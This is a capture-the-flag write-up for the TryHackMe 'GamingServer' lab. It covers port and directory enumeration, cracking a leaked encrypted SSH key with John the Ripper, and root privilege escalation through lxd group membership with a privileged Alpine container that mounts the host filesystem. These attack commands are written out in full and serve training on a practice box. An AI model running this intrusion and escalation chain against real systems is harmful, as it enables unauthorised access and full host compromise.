WriteUp — THM GamingServer
An Easy Boot2Root box for beginners
This is a WriteUp for TryHackMe Room GamingServer.
Start up by adding gamingserver.thm to /etc/hosts so you don’t need to remember the IP address with every tool.
NMAP
nmap -sC -sV -p- gamingserver.thm
Starting Nmap 7.91 ( https://nmap.org ) at 2020–10–21 16:22 EEST
Nmap scan report for gamingserver.thm (10.10.253.186)
Host is up (0.054s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
| 256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_ 256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.17 seconds
Web Server enumeration
gobuster -q -w /usr/share/wordlists/dirb/common.txt -u http://gamingserver.thm -t 20 -x php,http,txt dir 1 ⨯
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.http (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.http (Status: 403)
/.hta (Status: 403)
/.hta.http (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/about.php (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)http://gamingserver.thm/secret/secretKey reveals an encrypted RSA private key.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----http://gamingserver.thm/ source code reveals potential username.
!-- john, please add some actual content to the site! lorem ipsum is horrible to look at. -->http://gamingserver.thm/uploads/dict.lst reveals a potential password list.
Gaining access
Since the private key is passphrase protected we need to crack it first. Convert the SSH key to John hash:
/usr/share/john/ssh2john.py secretKey > hashcrack it with John The Ripper and the list we found:
john hash dict.lstSSH into the box using the private key and found passphrase and grab the flag from home directory and move on to rooting the box.
Privesc
Run linPEAS to find out potential PE vectors. Only two interesting items found:
User & Groups: uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)We are members of the sudo group which is nice, but can’t sudo without a password which we don’t have. So what about the other entry?
A quick Google search “lxd group exploit” reveals a vulnerability: https://www.hackingarticles.in/lxd-privilege-escalation/
Build an alpine container:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpinecopy it to the target box:
scp -i secretKey lxd-alpine-builder/alpine-v3.12-x86_64–20201021_1657.tar.gz john@gamingserver.thm:/home/johnImport the image:
lxc image import ./alpine-v3.12-x86_64–20201021_1657.tar.gz — alias myimage
Image imported with fingerprint: 0c08ba5b0e28f14a8c8b5508297af9c32eed8d26a30986c50187eff608a996baStart it up and get the flag:
lxc init myimage ignite -c security.privileged=true
Creating ignitelxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignitelxc start ignite
lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)cd /mnt/root/root
/mnt/root/root # cat root.txt
That’s all folks!